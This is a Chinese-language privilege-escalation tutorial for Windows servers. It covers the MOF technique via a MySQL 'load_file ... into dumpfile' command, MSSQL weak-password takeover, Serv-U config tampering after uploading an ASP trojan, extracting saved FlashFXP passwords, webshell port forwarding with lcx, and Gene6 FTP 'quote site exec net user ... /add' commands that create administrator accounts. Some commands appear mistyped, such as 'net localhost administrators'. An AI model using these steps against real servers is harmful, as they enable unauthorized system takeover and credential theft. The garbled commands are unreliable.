一、MOF漏洞提权
当可以远程连接时,利用工具提权,新建用户后,不会马上出现,稍等几十秒后就出现新建的用户。
当不能远程连接时,或不想开启远程连接时,我们找一个可写目录,上传一个mof 的文件
首先将文件上传在wmpub文件中
然后进入数据库管理,打开dvwa数据库,
执行下面这段命令
select load_file('C:\\wmpub\\moon.mof') into dumpfile 'c:/windows/system32/wbem/mof/moon.mof';
执行后,等待一段时间,查看是否新建了用户admin
注意新建的帐号每隔5分钟就会新建帐号,删除帐号的办法参考下面这个连接地址。
http://www.myhack58.com/Article/html/3/8/2013/38264.htm
二、Mssql提权
mssql提权主要分为弱口令与溢出两类提权。目前主要通过弱口令连接直接提权,溢出类Mssql数据库几乎很少见。
这个数据库默认是可以远程链接的,可以直接用工具连接
三、serv-u本地提权及带配置文件修改提权
安装serv_u
暂时不要启用
安装补丁,将补丁放在安装目录
汉化,因为这是收费的,英文版,我们这是破解版,也是安装在之前的目录
然后上传一个asp木马,放在搭建的asp网站
1、通过修改配置文件提权
首先找配置文件
修改配置文件,最后提交,成功添加一个新用户,有权限的系统管理员
找到安装目录,将文件添加一个有修改权限
成功添加系统管理员
密码用cmd5解密,=后面两位不用管,直接解密后面就ok
成功添加用户后,我们可以通过工具FlashFXP进行连接
也可以用cmd.exe连接
2、无修改配置文件权限提权
使用大马的servu提权
3、FlashFXP获取账号密码
下载quick.dat、sites.dat、stats.dat这三个文件进行本地替换,然后用星号查看器查看,就可以获取登录密码
四、Gene6
安装时除了安全、拒绝,其它权限全给。
Gene6 FTP默认安装路径是C:\Program Files\Gene6 FTP Server\RemoteAdmin\Remote.ini其中Remote.ini是主配置文件,管理员登录的ip、端口和密码都存储在这。但Gene6管理员帐号只充许本地登录。对于渗透测试人员来讲只需要通过Webshell转发端口就可以进行远程连接。
通过webshell上传lcx.exe 把端口转发,如:lcx.exe –tran600127.0.0.1 8021 接通过另外一台机器安装一个gene6远程连接600端口创建一个域再创建一个有权限的帐号,注意Gene6可单独定义SITE命令调用执行文件,通过quote site exec 执行就行
命令:
在获得服务器FTP管理员后可以用quote site exec命令来添加系统管理员,cmd下操作方法如下:
quote site exec net user 用户名 密码 /add 添加一个用户
quote site exec net localhost administrators 用户名 /add 把用户添加到系统管理员组
quote site exec tskill PID 在 Windows 2003 中通过 PID 关闭进程
quote site exec tskill notepad 在 Windows 2003 中通过名称关闭同类的进程
quote site exec net stop iisadmin 停止 iis 服务
quote site exec net start iisadmin 启动 iis 服务
